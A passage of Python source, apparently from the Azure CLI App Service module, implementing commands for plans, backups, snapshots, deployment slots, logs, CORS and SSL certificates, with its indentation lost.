HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase.id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = application_logging != 'off'
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
level = application_logging != 'off'
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except DefaultErrorResponseException as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
